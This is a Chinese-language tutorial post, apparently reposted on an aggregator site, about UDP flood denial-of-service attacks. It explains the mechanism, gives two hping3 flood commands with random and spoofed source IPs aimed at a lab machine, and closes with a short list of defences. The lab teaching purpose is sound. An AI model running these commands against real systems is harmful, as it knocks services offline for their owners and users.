UDP攻击实战及其简略防御方法[通俗易懂](TCP/UDP协议)
理論略解
在正常情況下,server端在特定端口上收到UDP數據包時將通過下面兩個步驟進行響應:
1、服務器先檢查是否有任何當前監聽指定端口請求的程序正在運行
2、如果該端口上沒有程序正在接受數據包,則服務器將以ICMP(ping)數據包作為響應,以告知發送方目標不可達
Hacker可以通過“UDP flood”泛洪攻擊,實現DOS/DDOS攻擊
通過構造大量的UDP數據包發起泛洪攻擊來消耗目標的帶寬資源,實現拒絕服務攻擊也可以說DOS(Denial of Service)
因為目標服務器會利用資源來檢查并響應每個接受到的UDP數據包,當收到大量的UDP數據包時,目標資源會很快耗盡,從而導致正常流量拒絕服務。
UDP攻擊實戰演練
環境:kali、windows(版本自定義),hping3(kali中自帶的程序),之后保持虛擬機內局域網中機器互通
附:
hping命令參數解析:
-a 指定源IP;-p 設置目標端口;–udp 采用UDP協議; –flood 采用泛洪模式; –rand-source 采用隨機源IP(指每次發包的源IP地址都是隨機變化的)
提前打開wireshark進行監聽
┌──(root?kali)-[~]
└─# hping3 –udp –rand-source –flood -p 666 10.10.10.132
此時返回wireshark查看抓到的udp包,我們可以看到源ip一直變并且端口也是指定的666端口
第二種方法我們可以通過指定源ip來進行流量發包
–fast表示快速發包的意思
┌──(root?kali)-[~]
└─# hping3 –udp -a 8.8.8.8 –fast -p 888 10.10.10.132
我們可以看到源ip變為8.8.8.8
實戰演練
1、協議禁用
2、限制每秒解多少包
3、寫一些路由策略將保丟掉
4、部署安全產品比如抗DDOS、防火墻、IPS等…..
總結
以上是生活随笔為你收集整理的UDP攻击实战及其简略防御方法[通俗易懂](TCP/UDP协议)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 人民币符号输入的几种方法图片_元的符号怎
- 下一篇: engagement center里如何